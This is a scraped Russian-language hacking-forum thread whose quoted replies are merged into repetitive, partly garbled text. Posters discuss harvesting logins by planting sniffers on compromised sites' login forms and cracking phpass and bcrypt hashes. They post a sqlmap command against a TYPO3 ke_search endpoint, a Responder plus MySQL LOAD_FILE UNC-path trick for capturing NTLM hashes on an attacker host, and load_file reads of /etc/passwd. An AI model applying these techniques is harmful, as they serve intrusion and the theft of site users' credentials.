на каких сайтах можно потестить xss?
на тех где есть хссна каких сайтах можно потестить xss?
на каких сайтах можно потестить xss?
локальные варианты куда лучше, ты можешь видеть логи и понимать как доходит твой запрос. Хотя для XSS ето не важно но для других уязвимостей очень супер гига ультра важно.на каких сайтах можно потестить xss?
bcrypt не сильно напряжный?) хотя у кого есть лишних пару сокту лет мб и расшифруютсядо сих пор встречаются самописные движки, где хранятся пасы в откытом виде. Также можно поставить снифер на форму входа и собирать mail:pass если рес посещаемый. Ну и расшифровывают, конечно, если тип хеша не сильно напряжный как bcrypt или wordpressовский.

Да, с bcrypt полная жопа, вроде читал, что некие энтузиасты на армах собрали для него адекватный брутер, но на видюхах его действительно не вариант брутить, а вот phpass (который wordpress) - вполне легко брутится, не чистый md5, конечно, но вполне в обозримом будущем, если по словарикам гонять.bcrypt не сильно напряжны?) хотя у кого если лишних пару сокту лет мб и расшифруются![]()
Поставить снифер это правда хорошая идея. Даже на те ресурсы которые 10 раз уже переслиты дамперов. Найдутся строки, которые сбрутить не удалось ранее. т.к пасс сложный.до сих пор встречаются самописные движки, где хранятся пасы в откытом виде. Также можно поставить снифер на форму входа и собирать mail:pass если рес посещаемый. Ну и расшифровывают, конечно, если тип хеша не сильно напряжный как bcrypt или wordpressовский.
Тебе сюда https://xss.pro/threads/26978/URL: https://example.com/typo3conf/ext/ke_search/Classes/Lib/autocompletion.php
Parameter: onlyPublic
Пробовал sqlmap -u "https://example.com/typo3conf/ext/ke_search/Classes/Lib/autocompletion.php" -p OnlyPublic --level 5 --risk 3 --dbs ( отдает ошибку )
Какой запрос лучше использовать?
403, или рейт-лимит, или ваф фильтрует. Руками надо проверять в чем дело: http://xssforum7mmh3n56inuf2h73hvhn...xdnyd.onion/threads/14482/page-30#post-571373Ребят, помогите, что делать при таких ошибках? Посмотреть вложение 104399
Приветствую,хотел бы еще услышать ваш совет о том как продвинуться дальше с маленьким предисловием и дополнением к прошлой информации.Разобрался с респондером(хэш не получил) , про win сервер я писал из-за того что sqlmapНельзя, если у вас запрос SELECT и нет stacked то как вы собрались делать UPDATE/INSERT.
stacked - в MySQL/Maria не частое явление.
Нужно искать в другом месте инжект, желательно в полях где информация потенциально обновляется - адрес, ник, пароль, интересы итд.
responder -I eth0
SELECT LOAD_FILE('\\\\attacker\\share\\payload.txt');
Если сервер MySQL запущен под учетной записью с сетевыми привилегиями, Windows отправит аутентификацию NTLM
я бы уделил этому внимание, возможно блокирует какой нибудь WAF. Это очень жирный вектор для продвижения в глубь. Пробуй разные варианты с чтением, разные команды, разные файлы. Ну и для начала хотя бы версию сервера узнай точную.попробовал select load_file('/etc/passwd') ответ пустой , хотя --is-dbarue и в --privileges права на всё